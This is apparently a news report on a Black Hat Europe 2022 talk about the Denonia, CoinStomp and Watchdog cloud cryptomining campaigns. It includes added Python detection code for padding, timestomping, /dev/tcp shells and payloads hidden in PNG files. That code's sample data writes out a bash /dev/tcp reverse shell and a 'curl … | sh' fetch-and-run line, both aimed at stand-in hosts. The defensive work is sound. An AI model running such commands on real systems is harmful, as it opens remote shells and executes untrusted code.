BLACK HAT EUROPE 2022 – London – CoinStomp. Watchdog. Denonia.
These cyberattack campaigns are among the most prolific threats currently targeting cloud systems, and their ability to evade detection should serve as a cautionary tale of threats to come, a security researcher said here today.
"Recent cloud-focused malware campaigns have demonstrated that adversary groups have intimate knowledge of cloud technologies and their security mechanisms. And not only that, they're using that to their advantage," said Matt Muir, threat intelligence engineer for Cado Security, who shared details on three campaigns his team has studied.
While the three attack campaigns are all about cryptomining at this point, some of their techniques could be used for more nefarious purposes. For the most part, these and other attacks Muir's team has seen exploit misconfigured cloud settings and other mistakes, which means that defending against them falls largely to the cloud customer, according to Muir.
"Realistically for these kinds of attacks, it has more to do with the user than the [cloud] service provider," Muir tells Dark Reading. "They're very opportunistic. The majority of attacks we see have more to do with mistakes" by the cloud customer, he said.
Perhaps the most interesting development with these attacks is that they're now targeting serverless computing and containers, he said. "The ease with which cloud resources can be compromised has made the cloud an easy target," he said in his presentation, "Real-World Detection Evasion Techniques in the Cloud."
DoH, It's a Cryptominer
Denonia malware targets AWS Lambda serverless environments in the cloud. "We believe it's the first publicly disclosed malware sample to target serverless environments," Muir said. While the campaign itself is about cryptomining, the attackers employ some advanced command-and-control (C2) techniques that indicate they're well-versed in cloud technology.
The Denonia attackers use DNS over HTTPS (DoH), which sends DNS queries inside HTTPS requests to a DoH resolver instead of to the platform's own DNS resolver. That gives the attackers a way to hide their lookups inside encrypted traffic so that AWS cannot see the malicious DNS queries. "It isn't the first malware making use of DoH, but it certainly isn't a common occurrence," Muir said. "This prevents the malware from triggering an alert" with AWS, he said.
The attackers also appear to have tossed in additional diversions to distract or confuse security analysts: thousands of lines of user-agent strings of the kind seen in HTTPS requests.
"At first we thought it might be a botnet or DDoS ... but in our analysis it was not actually used by the malware" and instead was a way to pad the binary in an effort to evade endpoint detection and response (EDR) tools and malware analysis, he said.
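As an added example of how that padding shows up in triage (this is not Cado's tooling or anything from the Denonia sample), the block below measures what share of a file is taken up by user-agent-looking strings. The "binary" is constructed here from deterministic pseudo-random bytes standing in for code plus a few thousand user-agent lines; the user-agent template is made up for the test.

```python
import random
import re

# Added example, not Cado's analysis tooling or code from the Denonia sample:
# a triage heuristic for the padding trick described above. The "binary" is
# constructed here from pseudo-random bytes plus thousands of user-agent lines.

UA_MARKER = b"Mozilla/"


def extract_strings(blob: bytes, min_len: int = 8):
    """Printable ASCII runs of at least min_len bytes, like strings(1); a newline ends a run."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return pattern.findall(blob)


def ua_padding_ratio(blob: bytes) -> float:
    """Fraction of the file occupied by strings that look like browser user agents.

    Real code and data rarely spend more than a few percent of their bytes on
    such text; a sample that is mostly user-agent lines is either a scraper's
    wordlist or padding meant to bulk the file and drown analysts in noise."""
    if not blob:
        return 0.0
    ua_bytes = sum(len(s) for s in extract_strings(blob) if UA_MARKER in s)
    return ua_bytes / len(blob)


def constructed_padded_binary(n_lines: int = 3000, seed: int = 1) -> bytes:
    """64 KiB of deterministic pseudo-random bytes (stand-in for code) + UA padding."""
    rng = random.Random(seed)
    code = rng.getrandbits(8 * 65536).to_bytes(65536, "big")
    template = (b"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
                b"(KHTML, like Gecko) Chrome/%d.0.0.0 Safari/537.36\n")  # constructed
    padding = b"".join(template % rng.randint(70, 108) for _ in range(n_lines))
    return code + padding


if __name__ == "__main__":
    for n in (0, 3000):
        print(n, "lines of padding ->", round(ua_padding_ratio(constructed_padded_binary(n)), 2))
```

The ratio is a signal, not a verdict: a legitimate crawler bundles user-agent lists too. What makes it useful here is the contrast between the strings content and what the code actually references, which is the observation Muir's team made when the list turned out to be unused.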
Extra Cryptojacking With CoinStomp and Watchdog
CoinStomp is cloud-native malware targeting cloud security providers in Asia for cryptojacking purposes. Its main modus operandi is timestamp manipulation (timestomping) as an anti-forensics technique, along with removing system cryptographic policies. It also uses a C2 family based on a /dev/tcp reverse shell to blend into cloud systems' Unix environments.
Watchdog, meanwhile, has been around since 2019 and is one of the more prominent cloud-focused threat groups, Muir noted. "They're opportunistic in exploiting cloud misconfiguration, [detecting those mistakes] by mass scanning."
The attackers also rely on old-school steganography to evade detection, hiding their malware behind image files.
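Two of the CoinStomp behaviours above leave artefacts a responder can check for. The added example below (not CoinStomp's code and not Cado's tooling) flags a backdated file by comparing its mtime with its ctime, and pulls the host and port out of bash `/dev/tcp` redirections in process command lines. The sample command lines, hostnames and addresses are constructed for the test.

```python
import os
import re
import tempfile
import time

# Added example, not CoinStomp's code or Cado's tooling: quick checks for two
# artefacts described above, a timestomped file and a /dev/tcp reverse shell.

ONE_DAY = 86400


def looks_timestomped(path: str, slack: float = ONE_DAY) -> bool:
    """Flag files whose modification time is far older than their change time.

    touch(1)/utime(2) can set atime and mtime to any value, but ctime is set by
    the kernel at the moment of the change and is not settable from userspace,
    so a freshly dropped, backdated file shows mtime << ctime (Linux/POSIX
    semantics; on Windows st_ctime means creation time). A legitimate file can
    show the same gap after chmod/chown/rename, so treat this as triage, not proof."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime > slack


DEV_TCP_RE = re.compile(r"/dev/tcp/([A-Za-z0-9.\-]+)/(\d{1,5})")


def find_dev_tcp_shells(command_lines):
    """Return (host, port) for each command line that opens bash's /dev/tcp pseudo-device."""
    hits = []
    for line in command_lines:
        m = DEV_TCP_RE.search(line)
        if m:
            hits.append((m.group(1), int(m.group(2))))
    return hits


def demo_timestomp_check():
    """Create a normal file and a backdated one in a temp dir; return the verdicts."""
    with tempfile.TemporaryDirectory() as d:
        normal = os.path.join(d, "normal.sh")
        stomped = os.path.join(d, "stomped.sh")
        for p in (normal, stomped):
            with open(p, "w") as f:
                f.write("#!/bin/sh\n")
        past = time.time() - 365 * ONE_DAY
        os.utime(stomped, (past, past))  # same effect as `touch -d '1 year ago'`
        return {"normal": looks_timestomped(normal), "stomped": looks_timestomped(stomped)}


SAMPLE_CMDLINES = [  # constructed sample process command lines, not captured data
    "bash -c 'bash -i >& /dev/tcp/203.0.113.10/4444 0>&1'",
    "/usr/bin/python3 /opt/app/worker.py",
    "sh -c 'exec 3<>/dev/tcp/c2.example.net/443; cat <&3'",
]


if __name__ == "__main__":
    print(demo_timestomp_check())
    print(find_dev_tcp_shells(SAMPLE_CMDLINES))
```

The /dev/tcp check is only meaningful where the shell is bash (dash and busybox sh do not implement the pseudo-device), which is exactly why it blends in on stock cloud images: no binary is dropped and nothing unusual shows up in package or file-integrity inventories, so the evidence lives in process command lines and outbound connection logs.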
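The simplest form of hiding a payload "behind" an image is to append it after the image's end marker, which viewers ignore. The added example below (not Watchdog's payloads and not Cado's tooling; the image and the appended shell script are constructed for the test) walks a PNG's chunk list to IEND, verifies each chunk CRC, and reports whatever follows. It assumes that appended-trailer variant; a payload stored in an ancillary chunk with a valid CRC, or in pixel data, needs other checks.

```python
import struct
import zlib

# Added example, not Cado's tooling or the Watchdog payloads: detects data hidden
# behind an image by appending it after the PNG IEND chunk, which image viewers
# ignore. Both the 1x1 "image" and the payload are constructed here.

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack("!I", len(data)) + ctype + data + struct.pack("!I", crc)


def make_minimal_png() -> bytes:
    """A valid 1x1 RGB PNG (one red pixel), constructed for the test."""
    ihdr = struct.pack("!IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # width, height, depth, RGB, ...
    scanline = b"\x00" + b"\xff\x00\x00"                  # filter type 0 + one pixel
    return (PNG_SIG + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(scanline))
            + png_chunk(b"IEND", b""))


def png_trailing_data(data: bytes):
    """Walk the chunk list to IEND; return (bytes after IEND, [(type, length, crc_ok)])."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    off, chunks = len(PNG_SIG), []
    while off + 12 <= len(data):
        length, ctype = struct.unpack("!I4s", data[off:off + 8])
        if off + 12 + length > len(data):
            raise ValueError("truncated chunk %r" % ctype)
        body = data[off + 8:off + 8 + length]
        (crc,) = struct.unpack("!I", data[off + 8 + length:off + 12 + length])
        crc_ok = zlib.crc32(ctype + body) & 0xFFFFFFFF == crc
        chunks.append((ctype.decode("ascii"), length, crc_ok))
        off += 12 + length
        if ctype == b"IEND":
            return data[off:], chunks
    raise ValueError("truncated PNG: no IEND chunk")


def is_polyglot_image(data: bytes, min_trailer: int = 16) -> bool:
    """True when a non-trivial payload follows IEND or any chunk's CRC is wrong."""
    trailer, chunks = png_trailing_data(data)
    return len(trailer) >= min_trailer or not all(ok for _, _, ok in chunks)


if __name__ == "__main__":
    payload = b"#!/bin/sh\ncurl -s http://203.0.113.7/x | sh\n"  # constructed, hypothetical
    clean, stuffed = make_minimal_png(), make_minimal_png() + payload
    print(is_polyglot_image(clean), is_polyglot_image(stuffed))
    print(png_trailing_data(stuffed)[0])
```

A few bytes of trailing data are common in legitimately edited images, hence the `min_trailer` threshold; what matters operationally is that the trailer is executable or script text and that the image was fetched by a process that has no reason to download pictures, for instance a cron job or a shell spawned from a container entrypoint.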
"We're at an interesting point in cloud malware research," Muir concluded. "Campaigns still are lacking somewhat in technicality, which is good news for defenders."
But there's more to come. "Threat actors are becoming more sophisticated" and likely will move from cryptomining to more damaging attacks, according to Muir.